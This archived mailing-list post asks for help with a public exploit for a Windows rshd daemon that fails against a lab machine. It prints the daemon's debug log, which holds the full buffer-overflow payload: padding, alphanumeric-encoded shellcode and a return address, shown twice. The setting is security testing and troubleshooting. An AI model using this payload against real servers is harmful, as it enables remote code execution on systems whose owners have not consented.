Exploit problem



Running a test of rshd:
http://milw0rm.com/exploits/4222

On the attacker side I get the following:
#./a.out 192.168.1.85
error: Connection refused

on the Windows side:


C:\Documents and Settings\Administrator\Desktop\rshd-bin-1.7\rshd-1.7\bin>rshd.e
xe -d -r
[0] .rhosts checking disabled!
Debugging RSH Daemon.
[0] Checking winsock.dll version...
[0] Creating socket...
[0] Binding socket...
[0] Listening...
[0] Ready for connections...
[0] Accepting connection...
[1] Client connected!
[1] Starting client thread...
[1] Accepting connection...
[1] Thread started...
[1] Setting options on the main socket...
[1] Processing client data...
[1] Receiving...
[1] ...got 1033 chars.
[1] ...got 0 chars.
[1] Remote user name: A
[1] Local user name: A
[1] Command: 'AAAAAAAAAAAAAδ♥Yδ♣Φ° IIIIIIIIIIIIIIIIIQ7ZjfXP0A1BAkAAvA2AA2BA0BA
XP8ABuyyKL2JzKBmxhL9KOKOKOu0nkBLEtq4lKAUWLNk3LS5QhUQhoLKroVxnkaOwPva8kRiNk6TNkgq
JNvQO0mINLMTKpAdC7KqkzvmTAO2zKjTEk3dVDwX45kULKaOFDUQXk1vlKFl0KNkaOuLdA8kS3TlLKmY
PlddUL0akstqKkQtLKQSp0LKw06lLKrP5LNMlKspWx1NBHNnPNvnZL0PkOIFu6V3SVu87C4r58t7T3Dr
coqDKOzpBH8K8mkLGK0PKON6QOOyM5BFK1zM38Wrv5azFbKOn0QxKigyYelmAGKOn6ACV3v3RspSQSpS
2c2skON0AvbH6GTOAvrsOyIqNu1xnDgjd0O7pWion6pjtPbqseKO8PbHLdNMdnXibwKOzvPSQE9oXPqx
kUSyovSy679oyFrpaD3dbuYoHPJ3Qxm7qiyVqipWkOn6QEion0E6cZAt56rH0cPmoyYucZRpCi7YXLOy
ywRJ3tMY9rUaO0zSmzynG2vMinG24lmClMrZTxNKLklku8RRKNNSUFyoqeATYoN6CkqGQBRqbqRqQz31
V1F1QEPQYoN0PhLmn9S5jnbsIoZvPjYoKO4wYoZplK2w9llCKtatkOjvPRyon0BHzOjnYpcPBsKOHVyo
N0fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA╖6
«q'
[1] Checking client...
[1] Client port: 514...
[1] Sending null byte result...
[1] Executing 'AAAAAAAAAAAAAδ♥Yδ♣Φ° IIIIIIIIIIIIIIIIIQ7ZjfXP0A1BAkAAvA2AA2BA0B
AXP8ABuyyKL2JzKBmxhL9KOKOKOu0nkBLEtq4lKAUWLNk3LS5QhUQhoLKroVxnkaOwPva8kRiNk6TNkg
qJNvQO0mINLMTKpAdC7KqkzvmTAO2zKjTEk3dVDwX45kULKaOFDUQXk1vlKFl0KNkaOuLdA8kS3TlLKm
YPlddUL0akstqKkQtLKQSp0LKw06lLKrP5LNMlKspWx1NBHNnPNvnZL0PkOIFu6V3SVu87C4r58t7T3D
rcoqDKOzpBH8K8mkLGK0PKON6QOOyM5BFK1zM38Wrv5azFbKOn0QxKigyYelmAGKOn6ACV3v3RspSQSp
S2c2skON0AvbH6GTOAvrsOyIqNu1xnDgjd0O7pWion6pjtPbqseKO8PbHLdNMdnXibwKOzvPSQE9oXPq
xkUSyovSy679oyFrpaD3dbuYoHPJ3Qxm7qiyVqipWkOn6QEion0E6cZAt56rH0cPmoyYucZRpCi7YXLO
yywRJ3tMY9rUaO0zSmzynG2vMinG24lmClMrZTxNKLklku8RRKNNSUFyoqeATYoN6CkqGQBRqbqRqQz3
1V1F1QEPQYoN0PhLmn9S5jnbsIoZvPjYoKO4wYoZplK2w9llCKtatkOjvPRyon0BHzOjnYpcPBsKOHVy
oN0fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA╖
6«q >C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\s1m0. 2>C:\DOCUME~1\ADMINI~1\LOCALS~1\Te
mp\s1m0.1'...
[1] Sending results...
*** [1] ERROR: Error sending results.
[1] Winsock error: Invalid socket descriptor.

C:\Documents and Settings\Administrator\Desktop\rshd-bin-1.7\rshd-1.7\bin>



Any suggestions?
Thanks,
Brian
--
Brian Toovey
admin@xxxxxxxxxxxx
http://vulntrac.com


Relevant Pages

  • Strange ssh hang with kernel 2.6.9
    ... namely my ssh client hanging soon after doing some cat to ... Appended is the strace of the client Andrew requested, ... load ssh did not hang as fast as without load. ... the client hanged after 171 chars (but this is not always so, ...
    (Linux-Kernel)
  • Re: Strange ssh hang with kernel 2.6.9
    ... the problem happens only when i do a ssh to my desktop running also ... > Appended is the strace of the client Andrew requested, ... > additional debugging output after the connection is made, ... > hanged before giving me the prompt, other time after much more chars), ...
    (Linux-Kernel)
  • Re: Strange ssh hang with kernel 2.6.9
    ... the problem happens only when i do a ssh to my desktop running also ... > Appended is the strace of the client Andrew requested, ... > additional debugging output after the connection is made, ... > hanged before giving me the prompt, other time after much more chars), ...
    (Linux-Kernel)
  • Re: line wrapping
    ... If a client were to type in a string of chars without a space, ... i need a substitution that would insert a break and newline at space ...
    (comp.lang.perl.misc)
  • Re: VPN/PPOE/RWW Questions/Security
    ... My client pc's are using static public IP's. ... My remote user is using the Remote Connection exe downloaded from RWW. ... > the wizard to configure for the VPN access. ...
    (microsoft.public.windows.server.sbs)

Loading